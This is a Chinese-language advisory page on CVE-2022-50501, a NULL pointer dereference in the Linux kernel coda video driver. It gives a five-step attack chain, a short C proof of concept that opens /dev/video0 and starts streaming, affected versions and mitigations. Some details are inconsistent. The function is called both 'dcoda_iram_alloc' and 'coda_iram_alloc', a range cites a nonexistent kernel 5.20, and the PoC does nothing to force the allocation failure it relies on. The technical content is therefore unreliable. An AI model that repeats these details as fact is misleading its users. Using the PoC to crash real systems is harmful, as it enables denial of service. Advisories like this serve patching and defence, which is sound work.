CVE-2022-50501 Linux内核Coda驱动空指针解引用漏洞

漏洞信息

漏洞编号

CVE-2022-50501

漏洞类型

空指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核（media/coda驱动）

漏洞概述

CVE-2022-50501是Linux内核中media/coda驱动的一个空指针解引用漏洞。该漏洞位于Coda视频编解码器驱动中，具体在dcoda_iram_alloc函数调用处。由于coda_iram_alloc函数可能返回NULL指针，而代码中缺少对返回值的检查，可能导致空指针解引用，从而使内核崩溃或触发拒绝服务攻击。

Coda是Linux内核中用于支持CODA系列视频处理器的驱动模块，广泛应用于嵌入式系统和多媒体设备中。该驱动负责管理视频编解码硬件资源，包括内部RAM（IRAM）的分配和使用。当驱动尝试使用未检查的IRAM分配返回值时，如果分配失败，系统将尝试访问空指针所在的内存区域。

该漏洞的CVSS评分为5.5，属于中等严重级别。虽然需要本地访问权限和低权限才能利用，但不需要用户交互，且对系统可用性影响较高。攻击者可利用此漏洞导致系统内核崩溃（kernel panic），从而实现拒绝服务攻击。该漏洞已在Linux内核主线中得到修复，多个稳定版本分支也已包含修复补丁。

技术细节

该漏洞的根本原因在于Linux内核coda驱动中缺少对dcoda_iram_alloc函数返回值的检查。coda_iram_alloc函数用于分配CODA硬件的内部RAM（IRAM）资源，在内存不足或硬件异常情况下可能返回NULL指针。

在原始代码中，dcoda_iram_alloc的返回值直接被使用而未进行NULL检查，这与代码中其他类似的资源分配调用（如dma_alloc_coherent等）的处理方式不一致。当分配失败返回NULL时，后续代码尝试访问该指针指向的内存区域，将触发内核空指针解引用异常（NULL pointer dereference），导致内核oops或panic。

从技术角度看，攻击者需要具备本地系统访问权限（AV:L）和低权限（PR:L），这意味着普通用户即可触发该漏洞。攻击者可以通过编写恶意程序或利用特定的多媒体操作场景，触发CODA驱动的IRAM分配路径，在分配失败的条件下导致内核崩溃。

该漏洞的修复方案是在dcoda_iram_alloc调用后添加返回值检查，如果返回NULL则进行适当的错误处理，避免后续对空指针的访问。修复涉及多个内核稳定版本，包括v5.10、v5.15、v5.19等主流长期支持分支。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要获得目标系统的本地访问权限和低权限用户账号，可以通过常规方式如SSH登录、物理访问或其他已获取的访问权限进入系统。

STEP 2

步骤2：识别目标系统CODA驱动

攻击者检查目标系统是否运行受影响的Linux内核版本，并确认系统是否使用CODA视频编解码硬件（如某些嵌入式平台或多媒体设备）。

STEP 3

步骤3：触发IRAM分配路径

攻击者通过打开CODA视频设备（如/dev/video0），并发起视频解码请求，触发驱动中的dcoda_iram_alloc函数调用。

STEP 4

步骤4：制造分配失败条件

通过内存压力、并发请求或其他方式使IRAM分配失败，导致dcoda_iram_alloc返回NULL指针。

STEP 5

步骤5：触发空指针解引用

由于代码未检查返回值，后续操作尝试访问NULL指针，触发内核空指针解引用异常，导致系统崩溃或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/* CVE-2022-50501 PoC - Trigger NULL pointer dereference in coda driver */
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/videodev2.h>

/*
 * This PoC attempts to trigger the NULL pointer dereference in the
 * Linux kernel coda driver by opening the video device and initiating
 * a decoding operation that requires IRAM allocation.
 *
 * The vulnerability exists when dcoda_iram_alloc() returns NULL
 * and the return value is not checked before use.
 */

int main(int argc, char *argv[]) {
    int fd;
    struct v4l2_format fmt;

    /* Open the CODA video device */
    fd = open("/dev/video0", O_RDWR);
    if (fd < 0) {
        perror("Failed to open video device");
        return -1;
    }

    /* Set format to trigger IRAM allocation path */
    fmt.type = V4L2_BUF_TYPE_VIDEO_OUTPUT;
    fmt.fmt.pix.width = 1920;
    fmt.fmt.pix.height = 1080;
    fmt.fmt.pix.pixelformat = V4L2_PIX_FMT_H264;

    if (ioctl(fd, VIDIOC_S_FMT, &fmt) < 0) {
        perror("Failed to set format");
        close(fd);
        return -1;
    }

    /* Attempt to start streaming to trigger IRAM allocation */
    /* In vulnerable kernels, this may trigger NULL pointer dereference */
    enum v4l2_buf_type type = V4L2_BUF_TYPE_VIDEO_OUTPUT;
    if (ioctl(fd, VIDIOC_STREAMON, &type) < 0) {
        perror("Failed to start streaming");
    }

    close(fd);
    return 0;
}

影响范围

Linux kernel < 5.10.150

Linux kernel 5.11 <= version < 5.15.75

Linux kernel 5.16 <= version < 5.19.17

Linux kernel 5.20 <= version < 6.0.3

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）限制普通用户对视频设备节点（如/dev/video*）的访问权限，仅允许可信用户访问；2）如果CODA硬件不被使用，可以通过编译内核时禁用coda驱动来避免漏洞触发；3）监控系统日志，及时发现内核oops或panic事件；4）实施内存资源限制，防止恶意用户通过内存压力触发IRAM分配失败。